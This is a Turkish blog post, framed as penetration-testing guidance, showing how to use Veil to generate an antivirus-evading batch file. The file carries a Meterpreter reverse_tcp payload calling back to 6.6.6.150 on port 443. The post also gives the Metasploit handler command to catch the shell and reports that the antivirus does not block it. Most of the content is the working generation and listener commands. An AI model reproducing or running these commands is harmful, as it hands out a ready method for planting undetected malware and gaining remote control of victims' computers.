31 Mayıs 2015 Pazar

Sızma Testlerinde Veil ile Antivirüs Uygulamaların Atlatılması

Penetrasyon testlerinde sıklıkla antivirus uygulamalarının atlatılması mecburiyeti doğmaktadır. Çeşitli encoding yöntemleri kullanılarak antivirus yazılımları atlatılabilmektedir. Smbexec, metload benzeri yazılımlar ile istenilen özelliklerde zararlı yazılım üretmek mümkündür. Aşağıda bunlara alternatif ve oldukça başarılı bir uygulama olan VEIL ile bu işlemin nasıl gerçekleştirilebileceğine değinilmiştir.


Windows işletim sistemleri üzerinde çalışan antiviruslere yakalanmayan batch file oluşturmak için aşağıda ki ilgili komutları çalıştırmamız yeterlidir. 6.6.6.150 ipsine 443 portu üzerinden reverse bağlantı kurarak erişim sağlanacaktır.


Öncelikle aşağıdaki komut kullanılarak batch file oluşturulabilir. İlgili komut çalıştırıldıktan sonra .bat uzantılı zararlı uygulamamız oluşmuş olacaktır.


veil -l powershell -p VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=6.6.6.150 LPORT=443









Windows üzerinde batch filemizi çalıştırmadan önce lokal makinamızda 443 portu metasploit ile dinleme moduna alıyoruz.


Aşağıda 443 portunun dinleme moduna alınması sağlanmıştır. Payload olarak reverse_tcp kullanılmıştır.



msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.150 LPORT=443 E







Windows üzerinde undetectable.bat dosyamızı çalıştırıyoruz. Çalıştırmamızla birlikle meterpreter shell bizi karşılıyor.






Zararlının çalıştırıldığı system üzerindeki antivirüsün zararlıyla ilgili herhangi bir bloklama işlemi gerçekleştirmediği aşağıda görülebilmektedir.



Kaynak: networkpentest.net

0 yorum:

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites